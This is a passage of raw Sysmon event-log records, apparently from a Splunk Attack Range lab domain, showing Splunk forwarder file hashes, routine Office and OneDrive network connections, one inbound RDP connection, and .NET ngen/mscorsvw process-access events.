Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=54A12689645F455BCD59303BADA9ABE6,SHA256=2FC0973B3AEDC5F2F94DE31BCA709299A4264C1F1C188F0BC93F693927D713C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.103{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5289743E67AFAC9D7DEE0451DEF746FC,SHA256=71DA642B1F88B2B6B953B385F90E1363C4386F985A5AAD937E32B53531F032CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.103{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=37FAB8A97775B8459C67EA6F6495DA58,SHA256=88CE03C1A3699477B093E06430D11B3CE8CC61088DDFBBD0EFE3F7F723E24E0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.103{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1E90D0008EDF939260DA57A72B7E5410,SHA256=C095495D01806CE9A79D04EE58B20C3E8CCE5976CBDE8A943E1CED581C51F136,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050542Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:29.919{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CC04FF05C002B980B5F8045CBF777EA,SHA256=5388C6B63A1413AD378DD8161453A2B97B78B181D4343197DC886FD4D2CE7752,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050541Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:26.334{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49912-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000080059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.277{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57576-false10.0.1.12-8000- 354300x800000000000000080058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.266{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57575-false93.184.220.29-80http 354300x800000000000000080057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.127{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57574-false52.109.20.0-443https 354300x800000000000000080056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.087{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57572-false52.114.32.25-443https 354300x800000000000000080055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.087{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57573-false52.114.32.25-443https 354300x800000000000000080054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.079{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57571-false52.114.32.25-443https 354300x800000000000000080053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.079{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57570-false52.114.32.25-443https 10341000x800000000000000080052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.936{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-640E-00000000BB01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.926{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-640E-00000000BB01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.926{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-640E-00000000BB01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.886{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-630E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.876{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-630E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.876{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-630E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:30.856{A7A01FEF-EC16-607E-620E-00000000BB01}4668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\123c-0\Microsoft.Office.Tools.dll2021-04-20 14:58:30.856 10341000x800000000000000080045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.826{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-620E-00000000BB01}4668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.810{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-620E-00000000BB01}4668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.810{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-620E-00000000BB01}4668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.786{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-610E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.776{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-610E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.776{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-610E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.736{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-600E-00000000BB01}6104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.726{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-600E-00000000BB01}6104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.726{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-600E-00000000BB01}6104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.666{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-5F0E-00000000BB01}5836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.646{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-5F0E-00000000BB01}5836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.646{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-5F0E-00000000BB01}5836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.576{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-5E0E-00000000BB01}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 